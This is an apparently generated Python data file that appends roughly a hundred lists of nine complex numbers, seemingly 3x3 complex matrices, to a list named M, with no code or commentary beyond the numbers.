M.append([(90.8017725348+1.32669194102j),(13.3641685204+41.4970988914j),(16.5867228559-6.20818906085j),(31.9365712759-36.2514564221j),(82.0858739768+17.826972612j),(7.85440011699-17.6457355057j),(-23.0406951348-43.9202228977j),(35.408772415-36.4948596393j),(34.1123534884-13.153664553j),]) M.append([(77.4675173508-29.7099637741j),(-1.62607695995+36.6975827855j),(-55.1757371241-38.8637120638j),(30.240474054-26.7655377261j),(42.2195518686+34.2858130607j),(-48.6958228285-41.077361339j),(-5.86275733453+18.4028620521j),(-5.58482025843-12.5912987855j),(95.3129307806+1.42415071338j),]) M.append([(102.738194879-29.380937312j),(-7.9230073533-18.2533490616j),(-13.0996381776-40.1652740691j),(-16.5229907014-15.4925049429j),(36.4489135015+6.47861570629j),(-12.9896543994+10.3262001981j),(-34.9646917604+33.4227002133j),(10.1515513999+12.806881782j),(66.8128916199+28.9023216057j),]) M.append([(70.4548869644-20.8650393474j),(-23.7821846219+6.29765506518j),(-39.5365639967+41.57638982j),(12.8974605168-19.1425275012j),(13.7043515634+8.53417281698j),(-13.750352703+16.3614678272j),(13.4740359516-12.0594633896j),(-13.5594695252+5.83534418203j),(13.8407614722+18.3308665304j),]) M.append([(49.439091486+90.3259209245j),(67.1141540382+0.492387588315j),(-9.94815693085+45.0412911438j),(19.0779898572-13.5905534454j),(93.1675941213+1.49294103812j),(3.40230467502-8.1468598263j),(83.221639853-191.169237527j),(-121.498864191+21.4788804902j),(114.393314393-85.8188619626j),]) M.append([(47.0150562355+39.5612806898j),(37.258915143+0.557156407092j),(20.8358224143-70.9145101009j),(-61.8399370491-15.4071564883j),(116.926940457+36.414656865j),(79.2825332926-18.8414870113j),(-33.418582253+52.5591024851j),(41.8093756005-11.8919096972j),(97.0580033074-69.9759375548j),]) M.append([(82.6162318299+14.88218896j),(-0.0812636608057-24.3890559103j),(23.427123921-4.50380274008j),(-10.1183793031+12.881733919j),(112.604332784-7.67638275563j),(19.4619831753+11.9323728245j),(17.7250066991-9.85607610334j),(-0.553863878894+18.2640556962j),(73.7794353866-1.20580620438j),]) M.append([(62.5296394488+7.13008864615j),(23.8009386684-12.1177110071j),(4.76200127289+48.1117151003j),(18.9613083819+4.26546599242j),(63.0566729394-13.5880595721j),(9.85868179019+39.2008506015j),(3.44831013919-13.2753146504j),(1.21910878312-13.6982833352j),(80.4136876118+12.4579709259j),]) M.append([(97.4846072512-58.8695982802j),(45.7733175277-3.47275106923j),(-2.98255243043-107.035717657j),(17.0152028516+51.9366434581j),(33.8435498896+30.1179319003j),(65.3429940517+33.1880411485j),(5.10365398098+34.775205284j),(-14.0735155534+17.8778300911j),(81.6718428591+34.7516663799j),]) M.append([(93.3637057275+5.68505355972j),(43.4564941494-30.8400026776j),(39.9045163691+18.6200358867j),(24.6679290727+39.1588423521j),(79.5823256376+20.9334997555j),(4.56184383716+27.7432601964j),(-29.3089063461-10.636352598j),(-35.9307449269+2.29944324179j),(34.0539686349-20.6185533152j),]) M.append([(-117.832803253-57.0711800385j),(-195.379522768+2.13256413876j),(24.6438264563-265.147482246j),(106.697881736+69.7014532881j),(183.42645042+27.983626389j),(-57.4209209967+217.410854163j),(3.13302428261+2.49075823804j),(5.61808700386-4.39023573661j),(28.4063528331+35.0875536495j),]) M.append([(171.355430466-5.55275351947j),(-132.67982498+12.7828181552j),(60.3062440957-30.9344155017j),(41.130780114-4.22204122332j),(16.08708647-1.13561430837j),(42.301272172-22.4054549433j),(-37.1421719571-4.6936406375j),(83.0639863968+14.0519687391j),(69.557483064+12.6883678278j),]) M.append([(102.012028705+23.5327925952j),(-3.63988607882+3.46604442186j),(14.0251305075+6.95362707498j),(-35.3143644705+69.0885154306j),(67.1310688186-38.1331880421j),(6.93037328866-36.9076068918j),(39.6960928398-52.1367245622j),(18.5497937924+31.0374861563j),(92.8569024768+20.6003954469j),]) M.append([(84.3443959705-2.34494382052j),(19.4525428834-27.1452598796j),(-9.51439963553-30.1710105146j),(19.2875281858-2.23637481923j),(130.586996994+9.55337841716j),(30.5372107861-24.0765134329j),(-23.8365696898+6.31327264458j),(-20.8021558061-33.3136971052j),(54.0686070356-1.20843459663j),]) M.append([(98.9720785947-141.875315242j),(154.902178162+52.0766765407j),(41.753406747+201.355317635j),(-19.1421514688-63.7071466538j),(115.290431241-21.3306786872j),(68.1870822482+55.1541638518j),(98.5892869837-84.7893874825j),(91.4885295419+105.7706331j),(-4.26250983587+169.205993929j),]) M.append([(60.1181664449+1.1458640085j),(10.7630096072-6.42295988181j),(-9.28929564736-0.991660595856j),(17.8578664518+38.2916610168j),(84.2960284685+30.9994786759j),(-4.12551590369-49.9427285958j),(-6.86692141441+23.4207998082j),(6.53879222644+32.4299833239j),(69.5858050867-26.1453426845j),]) M.append([(57.6822619106+23.5150162919j),(0.391100138681+14.0908133214j),(19.7484185597-6.92160891887j),(26.2614339094-12.3101458152j),(59.8903631827+7.7729593534j),(-12.5853610822-23.6277398785j),(25.8756281547+45.1301065421j),(-10.7617410553+30.7383130901j),(90.4273749067-25.2879756453j),]) M.append([(34.0136215365-25.1739446696j),(-45.528089481+15.0837777471j),(36.1228518353+2.96930134493j),(-8.66838455333-2.57287554394j),(42.0818274651+10.2040909629j),(2.47291106446-5.66066094972j),(18.5524933501+2.94569998381j),(-4.39066911632-13.4336563419j),(21.9045509983+20.9698537067j),]) M.append([(21.4793708692-26.2020859646j),(-28.6572902474-18.5269931554j),(-67.7206374229-59.0808002861j),(23.1417961681+21.2911730013j),(115.002243632+11.7189765847j),(16.3374090435+27.9575895888j),(12.2474311709+15.785590801j),(2.4324857357+6.61007757218j),(120.518385499+20.4831093799j),]) M.append([(85.3187589733+1.1792263911j),(14.0358407303-9.84152473204j),(10.7409393119+7.84653579175j),(10.4704119777+3.36437587114j),(80.9806231014-5.09687062924j),(-15.7631427427+13.6114047894j),(14.8756017658+2.84024882011j),(-39.204322871-16.0701013677j),(96.7006179253+9.91764423814j),]) M.append([(62.7968655439-18.9089860413j),(66.8171565692+28.1568852267j),(-67.5293160786+37.3148740452j),(29.7303132074-43.3262810703j),(58.8523934704+113.551145376j),(-72.768144005-105.113874356j),(38.4655031892+4.53977662624j),(-95.3943133296+13.3581961975j),(147.350740986-88.6421593345j),]) M.append([(54.6656170033+10.7953401523j),(-7.65211530903-8.56627389509j),(8.53249265183-0.43234815262j),(-21.6984104909-9.22234925353j),(61.199017268-0.6706184476j),(-17.2775291175+25.7968135405j),(22.1919108007+36.6016109894j),(-26.319217056-24.0407304256j),(89.1353657287-4.12472170467j),]) M.append([(137.667492824-12.2166085797j),(28.3955156437+31.089500941j),(80.8726100537+42.6528526339j),(-24.3864056809-40.7834165131j),(60.7971400675-17.3840807014j),(2.21569020604-51.522939764j),(-7.9877306026+44.4448687202j),(-24.1207255438+11.3936061491j),(17.5353671085+35.6006892811j),]) M.append([(67.2655580172-0.711165223639j),(-19.8927852772+24.0685499803j),(38.7236734855-19.6969643042j),(-12.0931172737-14.1761349552j),(81.5841303596+5.70743417721j),(-34.672557828-24.2350897273j),(9.43621852447+2.82919546778j),(-10.3126155932+4.66433886317j),(58.1503116232+1.00373104643j),]) M.append([(8.59767199008+14.0944785868j),(-7.99370581676+3.80071518542j),(-8.78703597861-20.7033325819j),(-15.7456477446+26.2370270621j),(30.941127914+16.3920057328j),(-8.5651717013-12.9508357814j),(-46.8314265351-9.4146861905j),(-14.4965549765+5.40456752019j),(56.4612000959-24.4864843196j),]) M.append([(103.708502626-32.6868759637j),(19.8263454648+138.768119975j),(121.465291927+28.4423254549j),(35.4406657186-47.7764595036j),(-34.0414802951+174.58820127j),(93.7175662617+173.841970926j),(-45.4060212147+0.575638152634j),(176.423202254+21.0304365677j),(187.332977669-135.901325307j),]) M.append([(90.8915510113-2.48814717568j),(12.8118758787-4.5348252876j),(18.2175624949-1.24130830846j),(-4.01853843628+44.6219876271j),(76.2257009531-2.68002942571j),(-24.2184464618+2.4531813192j),(44.8167354592-24.0043800982j),(-6.93611991441+11.1704711864j),(96.8827480356+11.1681766014j),]) M.append([(70.7009930759+10.4957922204j),(-45.2712518981-24.0089939942j),(-30.589568406-0.812277669498j),(-14.2815778036-3.42808415495j),(85.8414363124-32.9922362297j),(-13.6294158708-22.128548863j),(12.1674435125+13.7028613714j),(-1.47516674328+48.1515992326j),(112.457570612+28.4964440093j),]) M.append([(47.6329552014-67.8615126015j),(49.5524414035-28.6152783264j),(-86.2445692107+2.81813083225j),(11.0892804787+26.3856935236j),(38.1276760452+16.9530046633j),(26.9911720482-11.3715680518j),(-48.5099513096+59.1074433986j),(-59.8461711152-10.0321678742j),(121.239368753+56.9085079382j),]) M.append([(88.8640323437+8.82848697774j),(6.45633864908-13.3102408526j),(60.9038227569+20.5561404121j),(-11.7960070904+10.0307062076j),(49.2531479402+7.93501659607j),(-24.3386025608+8.6047051073j),(14.8482463235-7.95843389707j),(-3.12797382452-3.27616852817j),(72.8828197161-10.7635035738j),]) M.append([(123.219078955-10.6870491159j),(-56.1726267315+32.4467299098j),(51.7965708653-0.7538057727j),(0.84941996356+9.53692889747j),(44.251973055-7.77034247674j),(0.769061337976+6.77802327637j),(-0.904007788281+34.5300934651j),(-6.78589696533-19.806361914j),(37.5289479897+24.4573915927j),]) M.append([(-18.9310210792+59.1486261293j),(110.724610232+26.8836990234j),(-42.9858312368-133.572364513j),(-26.6172512407-4.25311139609j),(41.2531273596+40.1672321337j),(34.5324653343-38.2359915542j),(-59.5828513478+8.83366290986j),(55.5015878219+62.0712269945j),(72.6778937196-93.315858263j),]) M.append([(94.5514858278+11.4962861062j),(9.91337292747-7.37525044822j),(-35.1184823176+19.6065525748j),(-25.8578044907+17.9615419939j),(130.081282417-10.3339964463j),(-44.6461430411+36.8213650029j),(-41.3318794112+1.70804325871j),(32.4441873557-0.126289210812j),(32.3672317549+4.83771034007j),]) M.append([(103.457144425+4.13642486708j),(-20.4614297439+6.91921955321j),(-2.61893032056-34.9985670678j),(14.4720425809-11.2998625794j),(35.6788776757+34.4179190621j),(-29.2212409157+8.88413450999j),(-8.2505082318+23.2407066203j),(41.2628291851-67.7473800004j),(125.863977899-32.5543439292j),]) M.append([(59.0960134559-8.38134343097j),(0.683475211897+21.1133474501j),(-27.1047150479+56.8655019399j),(-20.2236197861+7.15190429415j),(101.885640751+8.97875158272j),(3.13005932468+31.2785298195j),(-8.14353541355-7.99244495893j),(5.86886327389+13.3873259156j),(108.018345794+5.40259184825j),]) M.append([(80.448274403-19.2061584962j),(-54.7793767107-8.70330807447j),(-62.6311688074-15.5099983934j),(-0.620846686339+8.19765871416j),(61.6070712497-8.80800675484j),(14.6509124863-14.4853715463j),(-24.2539434684-4.33031414861j),(20.876645049+28.8964494896j),(65.9446543473+34.014165251j),]) M.append([(73.783259423+21.4044134808j),(35.143747544-38.6251980042j),(39.8654250954+29.404906444j),(20.2552872226+1.36273459063j),(60.6329374277-33.575346291j),(28.5434570737+7.09180595013j),(24.8116643155+10.1088644026j),(19.7112858837-36.9854629612j),(80.5838031493+18.1709328102j),]) M.append([(78.5783764713+14.8691438716j),(19.256996406+16.9265330381j),(14.7161065642-16.7307381962j),(34.5196367358-15.3293434802j),(79.6197692879-1.78052441054j),(-10.7970742512-23.0388429114j),(17.0709415368+5.78321150246j),(7.13313564686+10.1667912861j),(50.8018542408-7.08861946104j),]) M.append([(69.8104981296-14.6002130341j),(-9.65195525091-6.98306009726j),(15.0684702123+9.80038410809j),(-24.529577325-60.6144654645j),(7.84930998004+13.3949575437j),(9.73125184467-22.3090059744j),(-21.3153628854+23.7306123972j),(3.81415849729+13.5672558977j),(18.3401918903+7.20525549044j),]) M.append([(81.6980038661+10.7298177175j),(-8.48518330343-33.7196804119j),(-26.2900796223-35.3388864297j),(3.40883749205+36.8711963966j),(66.3903737132+3.93844461112j),(-51.9988039681+30.3511619841j),(-7.82614532974+1.01816760573j),(-0.123329861098-11.2645367202j),(108.911622421-8.66826232859j),]) M.append([(108.264398247+39.8270311999j),(22.5951029544-19.3149939707j),(-35.1263692899-5.4260830331j),(76.8987609448+8.02302584349j),(71.5703784034-40.865894038j),(-28.646537217+33.1521705434j),(4.17079072894+30.1549820339j),(8.04597418642-20.6857580202j),(86.1652233492+7.03886283805j),]) M.append([(108.924085182+19.4670795877j),(13.5082640061-9.61617483277j),(-8.00781309039-1.35313415496j),(32.4500093211-20.5794035665j),(74.4220674246-34.6227137792j),(-21.9915290538-18.8540096675j),(-32.2639666888-11.5559572569j),(-17.2174086922+30.3106249902j),(85.6538473931+21.1556341915j),]) M.append([(95.904678203-9.92689911864j),(61.1956140567+26.0367041133j),(23.3880294506+49.6246939228j),(45.3111771775-34.8955639193j),(120.537979371-5.04674953336j),(48.9037983528+41.1335371157j),(6.68351752865+56.0022084373j),(-32.1531247472+59.1816274411j),(-10.4426575737+20.973648652j),]) M.append([(69.8004858606+30.8744694526j),(-18.665901327-24.7616462993j),(25.0159155139+11.8201985428j),(-24.6010432688-16.5386763552j),(71.9289815062+14.2186877947j),(-25.1915220313+3.29348231257j),(50.6389896373-24.4017933151j),(-49.9215216436+24.0196324198j),(72.2705326332-39.0931572473j),]) M.append([(68.2584692833+23.7386469853j),(27.3321006606-14.7958598503j),(-2.93142595975+31.0257916307j),(-8.98971608583+39.8237519347j),(68.0732595015+15.4018779619j),(-35.8550348091+18.1423625455j),(-11.2756660417-39.2696523512j),(-32.1230885283+8.92721088471j),(68.6682712152-33.1405249472j),]) M.append([(37.8193587531+5.90254248719j),(-29.6375803612-2.26830320158j),(21.5538940295-0.495606908173j),(-0.529642783898+15.7877421305j),(22.28133118-21.1843597687j),(6.55857993359+27.6076249578j),(3.98998700211+2.79295348384j),(7.60503328792-25.4580094768j),(36.8993100669+21.2818172815j),]) M.append([(92.4283710008+26.6669506466j),(6.3218539258+2.20885730534j),(28.4176575584-9.87829946545j),(57.9010193022+21.2797910225j),(112.686448922-3.47334929637j),(-30.032910304-52.7431275838j),(58.9264811357-21.6645028261j),(-4.52394136529-3.77678701214j),(51.8851800773-17.1936013502j),]) M.append([(92.2354125513+4.25942802965j),(-105.278578854+18.6830304062j),(-42.7020599544-5.18047542942j),(-6.29992609908-4.80949156393j),(84.9818439901+23.6954924544j),(3.32361173035+9.92085782656j),(-8.67821646618-6.61569521961j),(-48.1644880887-61.2726624169j),(89.7827434587-21.9549204841j),]) M.append([(97.6893456623+2.38761628774j),(-19.0397579342-6.10204813131j),(-9.41222688807-17.1954024246j),(-8.11415650323-8.30923174665j),(83.5025437027-14.1275051115j),(18.0950710949-21.7220776175j),(-4.47074985218+10.7421440223j),(20.1183055304+11.1773881522j),(87.8081106349+17.7398888238j),]) M.append([(243.519427477-42.9414382899j),(-2.00387641418+83.4103155175j),(83.7071538717+210.765061708j),(-145.85696496+262.712491059j),(-40.7097552546-79.858440724j),(-308.337444407-124.398808608j),(111.719193283+51.2232009768j),(-29.3003185987+36.926471936j),(2.19032777793+128.799879014j),]) M.append([(54.9526117183+130.608946514j),(-101.410570548-34.0046706769j),(15.5430769498-131.078361171j),(-152.909634464+36.2801911484j),(65.337057529-128.062664117j),(160.327412985-13.2417646954j),(-42.0332170902+2.79067473086j),(11.6133094113-34.6758773433j),(91.7103307527+3.4537176029j),]) M.append([(60.6848512838+13.9026617965j),(-9.52923064951-26.7683481933j),(3.36742226293+4.46488624477j),(-17.4390907253+39.5423600764j),(75.4747863981-21.3091050588j),(-34.7091705053+9.2557357842j),(24.0919834516-6.37813516367j),(-16.2509923187-8.08506072026j),(69.840362318+13.4064432623j),]) M.append([(35.101121126-0.487928501408j),(7.15663452544-9.78218160505j),(-14.5534384147-14.6568134885j),(-0.935924959252+12.9127818699j),(11.2477699728+8.06479464457j),(-19.9768777442+30.012779837j),(-6.46517810002-1.09447402327j),(0.11872205276+2.44479949501j),(46.6511089012-1.57686614316j),]) M.append([(110.192657869+9.46369674681j),(46.0980587151+1.96376715327j),(-36.0374770432+24.019392579j),(9.74174002571-13.1867973175j),(57.1705585268-89.354557985j),(86.5221534057+48.618093984j),(11.9992053187+1.53927329102j),(69.6193083593-58.5100444846j),(77.6367836041+85.8908612382j),]) M.append([(235.232918782+109.351586845j),(-96.282337644-50.2755939626j),(-78.5648186997-18.3840159907j),(135.497065252+126.03128804j),(6.9361232653-55.5745324332j),(-89.700636183-25.30597341j),(127.17759781+177.727195871j),(-108.324406155-92.9519508681j),(13.830957953-47.7770544114j),]) M.append([(119.283509173-1.43772124j),(32.1868147996+15.6544793577j),(-1.17630336855-1.68296711141j),(-9.33657624484+12.6873043053j),(38.3161489074+4.65515325717j),(10.1577586932+9.38401262345j),(0.801962674867-7.07300409071j),(42.1873414242-34.3279645018j),(89.4003419191+2.78256798283j),]) M.append([(105.715272593+0.850196168449j),(-10.1555065591-4.3608919722j),(1.20034520075-7.38687108345j),(-0.183732111291+37.4417309477j),(80.9037899034-8.21515321666j),(45.4335476071+2.41662701114j),(-13.2521033851-27.5791725367j),(32.3067240587+13.3999585898j),(56.3809375037+13.3649570482j),]) M.append([(114.57486799+13.4871758267j),(-20.5351998827+6.9963713315j),(3.51142723925+15.32304962j),(-5.99539175682+8.48290088568j),(96.4170597152-9.71378277248j),(-8.67932291935+4.15059392923j),(0.241955465372-0.642562386373j),(0.0856654974695+0.545918212651j),(103.008072295+2.22660694576j),]) M.append([(47.1220396265+4.02839701954j),(-1.47752951135+6.83286416046j),(-3.29983964832+2.90701804101j),(-1.8592944873-8.24195313376j),(47.1046322569+0.850045628101j),(5.81390194013+3.28176488968j),(-3.45175990534-1.40197780474j),(2.23040263184-0.575641232947j),(43.7733281167+1.12155735236j),]) M.append([(42.6868687011-1.72591283219j),(-9.65012701239+2.41231893075j),(6.6597505156-10.4326157672j),(-11.5797952783+15.9899773803j),(25.8870908275-3.28647848827j),(1.9980335761+21.7690649323j),(-2.28362816278+5.66733828388j),(6.76092655266-19.9353632333j),(31.4260404714+11.0123913205j),]) M.append([(31.3814089382+1.95979439911j),(0.0801874741704-0.108322470124j),(0.0470668889667+0.454484780798j),(1.56229631699-0.978811697906j),(31.6114934605+1.00596090382j),(-0.00787596511402-2.27241456742j),(-0.925901663036+1.01923366957j),(0.366557302036-0.111678368719j),(33.0070976013+3.03424469707j),]) M.append([(119.165050879-0.722555982337j),(0.215617332273-2.17351995506j),(-1.63276953586-0.747713613105j),(-8.1015757753-0.0604046152383j),(115.954612521-0.636532984997j),(0.991539192569+5.13803367478j),(-4.22979808976-11.0067186005j),(3.72213160802-5.6087335004j),(109.880336601+7.35908896733j),]) M.append([(107.710702904+10.5883062519j),(-1.17611712868+4.63089902592j),(4.16234701509+6.93031972456j),(-57.743793126-0.651610558364j),(89.6815052056-12.7169859038j),(-17.7645327474-15.2112689962j),(18.123992287+7.01542537427j),(-0.650451445185+5.25484390203j),(96.6077918905+8.12867965189j),]) M.append([(60.1410079873+8.55430980994j),(26.5529422475-28.8713845391j),(-23.8765183204+20.9008735913j),(-26.165538516-44.0817539662j),(119.028312017-11.3636222158j),(-32.4071970686+6.85723486162j),(-62.2027322754-65.8679365707j),(69.6252482493-22.1608860913j),(28.8306799956+8.80931240591j),]) M.append([(45.8814605212+21.6340267175j),(52.6366303876-42.4187312578j),(49.9113217343-70.0062548325j),(11.8427795113-15.590122524j),(98.8828102042+21.9989203084j),(-1.28013998878+36.013490271j),(-2.04159128029+33.6744961581j),(-7.34070980209-41.8126514533j),(82.2357292745-37.6329470258j),]) M.append([(89.4834187505+23.6889185269j),(-12.907779693-33.9454974297j),(48.4649508445+1.21848116814j),(-15.7030540309+20.6291899422j),(88.1114183689-25.3149389508j),(-12.346274872-35.4016311272j),(27.425550243-2.91542684813j),(-15.4645993372+34.8982658211j),(53.4051628806+7.62602042396j),]) M.append([(112.424653186+2.62125224425j),(2.45486999572-2.9462251158j),(1.01084335009-5.60102261884j),(-1.09967640679+1.4124059971j),(111.995362731-1.33042814561j),(-5.67924889455-4.35774965748j),(6.32425091254+1.69049528193j),(-8.53901442899-0.387358901212j),(106.579984082+4.70917590136j),]) M.append([(114.965108767+4.94241618906j),(-0.203876190915-4.1321396226j),(2.28495850808-2.75077252569j),(3.40210942067-0.404929230641j),(109.576137524+3.69434536479j),(-4.67330440367-1.67820355289j),(0.941248586702+4.11402062953j),(-2.29968117043-5.42685616093j),(116.458753709-2.63676155385j),]) M.append([(80.6101387765-32.7947113323j),(-43.6203107047-12.7665347707j),(-4.54634470732-36.6095777989j),(-43.3891036899+1.99406787227j),(55.5227254638+21.2579657273j),(-32.3472555107+22.3675497936j),(1.83831409154+21.7127991713j),(9.55212127931-0.273383226388j),(72.8671357597+17.536745605j),]) M.append([(99.4865549072+2.00523447849j),(1.84929939736-0.6107285689j),(-0.857946955911+0.808638385135j),(-0.948539210914+0.015909510678j),(102.123803215+1.81213055312j),(0.362240553566+0.909205737845j),(-0.185308901594-0.891879373476j),(0.516088224767+1.25496448866j),(101.389641878+2.1826349684j),]) M.append([(135.537221096+70.1653605373j),(-21.7286984541-60.7726205302j),(-46.1968952887-67.7379357591j),(57.8040830268-47.5198429877j),(58.4499981722+43.0754799826j),(-48.8311411751+69.0242673837j),(17.1087174146+105.254588859j),(-12.4523636529-95.9220839281j),(63.0127807314-107.24084052j),]) M.append([(60.8373280218-12.8782176106j),(91.2781733242-3.40123670246j),(-123.834685946-90.9088126174j),(-36.8611697645+21.5579621603j),(159.973102353-52.7524414303j),(-118.785741046+22.7092512904j),(-9.4280639841+32.3606157146j),(1.25706890609-55.9873765866j),(57.1895696255+71.630659041j),]) M.append([(85.4845851024-2.30053929386j),(-17.6463088921-4.10729810698j),(4.00218783529+27.5524065968j),(-2.79471904238+10.3718086027j),(111.715698073+8.65155171462j),(6.99469538328+0.939467896385j),(15.3182364737-43.1000460602j),(3.98407859375-30.8963052965j),(69.7997168245-0.351012420763j),]) M.append([(69.5854236323-3.94841533055j),(-2.36216641884-2.24694864323j),(5.31948089815-0.455635625439j),(-42.9040690824+105.795648728j),(18.0606556807-3.19335207648j),(10.6925854223+79.3758129432j),(75.8560950559+47.0106443548j),(-15.1013571342+23.6088510131j),(120.353920687+13.141767407j),]) M.append([(69.8470339389+24.0181241363j),(12.4678911076+1.58200023723j),(-9.37674969507+28.0533309159j),(13.6982895674+45.9536655625j),(113.248598583-22.1113603877j),(32.0191779025-0.741958851688j),(-29.1812784796-41.9113185711j),(-13.2466070796+26.3945394812j),(52.9043674783+4.09323625136j),]) M.append([(72.3465364983+7.9898684627j),(24.9269496239-35.8510923219j),(39.4686719101-38.0150618422j),(8.63694759299-9.63488677104j),(104.269482363+20.8872659386j),(-16.4801955459+23.8225885124j),(17.978033418+34.067828652j),(-58.2975884376-20.487732131j),(54.3839811392-22.8771344013j),]) M.append([(69.0263598676+75.3278938741j),(-17.1489372988-152.848594721j),(7.91642008042+79.7766304773j),(20.001141979+26.07126504j),(60.5335056941-6.94608682712j),(29.9433954524+6.64327299977j),(117.493366204+1.4271196597j),(-167.60798043+122.906710649j),(201.440134438-62.381807047j),]) M.append([(114.014061271+0.0432677994851j),(3.32928587328+1.4794907798j),(-0.700453494199+3.83729483013j),(1.5876661402+1.60960808838j),(112.80394279+2.2642337851j),(-0.350381857968-3.52418200844j),(-0.504354158912-0.946815946927j),(-0.034485703281+1.48876625043j),(114.181995939+3.69249841541j),]) M.append([(86.6161455537-0.0435711871878j),(28.1921458534-2.83682201778j),(-42.4218855923-9.41393256034j),(-36.6988937847-4.2069567269j),(26.990152386-4.21628827004j),(15.8009255582+9.83079031979j),(-32.0250833804+17.6928862962j),(-35.2233305246+15.1484308003j),(104.39370206+10.2598594572j),]) M.append([(21.0682426737+7.71988180105j),(-0.918417189398+6.39251556937j),(-4.40684842887+5.75705587872j),(16.727229848-53.0434528131j),(35.4361705399+3.37692411644j),(24.9314312837+15.0597077986j),(-7.0465314903+29.0691265279j),(-13.9789892464-0.109212126002j),(-4.50441321357-5.09680591749j),]) M.append([(103.289653622+3.7423147444j),(8.6329948904-2.26440626335j),(-1.85755821553+8.06162781606j),(-0.0582229022295-1.59927083939j),(108.037368744+5.15172843857j),(-1.9647392308+0.191283997811j),(-1.91385794787-0.207795205628j),(1.14211771109+12.0295284779j),(94.6729776344-2.89404318298j),]) M.append([(51.6764003565+2.63985430354j),(10.1756640133-1.18344906576j),(-3.36429844964+4.48563849194j),(8.55976683465+2.63138673594j),(50.5420702208+5.02297870696j),(-10.6639172128-3.07825386464j),(-0.459435677446+1.06302720506j),(-1.8673381804+3.43159106865j),(47.7815294228-1.6628330105j),]) M.append([(47.4375364242+2.49915406193j),(0.123170195986-0.623847402749j),(0.809091876774+0.757038229319j),(0.351802310979-0.145082137898j),(48.0374721208+5.02613198862j),(-2.32875863747-0.658912613282j),(3.15919794302+1.21798731444j),(-3.12687708832+5.04897664089j),(45.524991455-1.52528605055j),]) M.append([(49.5261950931+3.26581402301j),(-2.50969779484-0.731549028376j),(-1.40493955525-1.91598868101j),(0.514255126773+1.21148738816j),(45.2366189692+2.41800044786j),(-1.55761766957-2.21296615778j),(-0.271353271855+2.6595363305j),(-0.621952526633-2.92966316164j),(49.2371859377+0.316185529128j),]) M.append([(39.658402155+1.45228284001j),(1.74259825087-1.70238401407j),(-0.421924773347-1.25269853971j),(1.40577215415-3.38408904712j),(44.0007858931+3.72820806017j),(0.962917944975+0.0294767268362j),(-3.66074629861-0.887462591998j),(1.00154360933-4.56785395881j),(40.3408119519+0.819509099818j),]) M.append([(46.0272255593+3.20168864875j),(1.00318721873+3.41142092891j),(0.131007877483-2.43784597634j),(1.55330123788-6.44887024941j),(44.7994027923+1.08859035467j),(-4.27488727879+0.888471983029j),(0.847004397417+2.57012643982j),(-0.0334651852447-0.629399006082j),(42.1733716484+1.70972099657j),]) M.append([(43.4849690347+6.76913923329j),(7.75990165628-1.14293134828j),(-6.41815049265+1.69786322563j),(6.54126859466+3.34916177392j),(47.6457652277-3.81100225117j),(-5.59304772013+5.03416039767j),(1.71259842253+1.94278356584j),(2.83524715248-2.09559252905j),(39.8692657376+3.04186301788j),]) M.append([(46.3019927415-0.798077470044j),(3.84075727796-1.25264340538j),(-3.57510182865-1.40583929699j),(4.21611973529+0.412138322461j),(47.4880564952+7.5813736794j),(3.97024800891-4.72250324777j),(2.64930135023+1.29053808586j),(0.0653104527345+3.22875061152j),(49.2099507633-0.783296209352j),]) M.append([(39.6324354143+0.435964091737j),(-3.50566622891-12.0236914786j),(11.2330049972-1.77541082292j),(0.404365211391+0.659858299114j),(42.4359518393+9.80774041684j),(-7.72368683144+0.396579452234j),(-1.40595679909-0.695540129368j),(-7.35833897631-5.83853349753j),(46.9316127464-4.24370450857j),]) M.append([(48.0995406019+1.96270726004j),(0.929259551447+0.577143979508j),(-0.477260967951-0.317380990402j),(-0.507829373528-1.16904127664j),(47.8610078871+2.31880625079j),(-1.28605812998+1.55707582905j),(0.638018732591+1.94374073088j),(-0.590288555718-1.15691030985j),(48.039451511+1.71848648917j),]) M.append([(45.6188369935-0.818521975439j),(0.729827720897+0.287634611263j),(-0.79182818746-2.90634131809j),(4.3507884204-3.19719588061j),(41.4849720369+1.35391227976j),(-2.34616404628-2.27889629472j),(-4.63306570154+4.50482507916j),(-0.328224604971+0.737970883468j),(44.8961909695+5.46460969568j),]) M.append([(106.324588051+10.8731088704j),(19.6848878059+9.70067613377j),(-3.31868184295+19.3545693384j),(0.593937031332-2.11664223001j),(100.773389868+1.12045168396j),(-0.973258001804-4.91266727971j),(-3.21342931795-4.37803295572j),(-8.57380910799+2.85526736991j),(100.902022081-5.99356055432j),]) M.append([(39.1669354915+47.0863917582j),(65.3979508516-20.2186450916j),(23.2857398822+14.0763252053j),(35.7953805582+29.6072137073j),(66.7700540066-31.823790865j),(25.9992452177-1.02616051187j),(19.5834153356-14.2371010588j),(1.16960820966-5.9996454958j),(39.0630105019-9.26260089318j),]) M.append([(115.636576832-4.56557284873j),(21.5227194197-37.1985421782j),(-6.08483493028+42.889781472j),(-2.74485991651-1.71187830814j),(101.51024193-24.2144404086j),(22.0047112579+18.471687189j),(-3.55192308103-4.65156846615j),(11.1326831224-30.6478497966j),(119.853181239+34.7800132573j),]) M.append([(112.1974086+2.69385054682j),(-2.09274540451-0.298104576828j),(-0.859416693475-2.24216364065j),(-0.853528569615-2.4562665895j),(113.371971248+1.46888046974j),(2.30111108173+0.106513515424j),(1.02044251935+0.391764567615j),(2.08662645021-0.50750798765j),(113.430620152+1.83726898345j),]) M.append([(88.4413801771+17.5336561874j),(-7.41633232872-17.1066192501j),(24.1590173706-19.688529107j),(-37.6976918197+59.3229766702j),(83.0739610034-26.5439321794j),(31.9034492623-66.5277089527j),(13.8237659292-10.4997184341j),(5.77704899569+9.69617030586j),(101.48465882+15.010275992j),]) M.append([(14.4769769729-33.9117550969j),(-4.99191660223+42.5707731714j),(-17.7646709435-2.6761689034j),(-87.01493846-44.8665547596j),(85.7065352972+52.9470554793j),(-14.1391856935+18.9908571191j),(35.571388591-101.807653631j),(-52.837332623+75.7366810709j),(3.81648772993-13.0353003825j),]) M.append([(121.653164547-13.6520642841j),(-36.9469457472-59.6355024346j),(-79.4993577869-81.2374968309j),(-25.4320525271-10.4019296001j),(59.6636206605+65.255928976j),(-40.0321839351+108.19011837j),(12.7042135869-14.3555378538j),(-37.1185186951-37.318878059j),(26.6832147926-45.6038646919j),]) M.append([(64.8766587026-9.71753273161j),(-14.8215893466-7.71931686024j),(6.31356785588-17.1125591296j),(7.94139096197+6.88556913224j),(48.5331188719-2.31415996485j),(4.85740390556-2.77920339403j),(23.0675330109+14.96446139j),(18.1763521629-49.212696387j),(104.590222426+18.0316926965j),]) 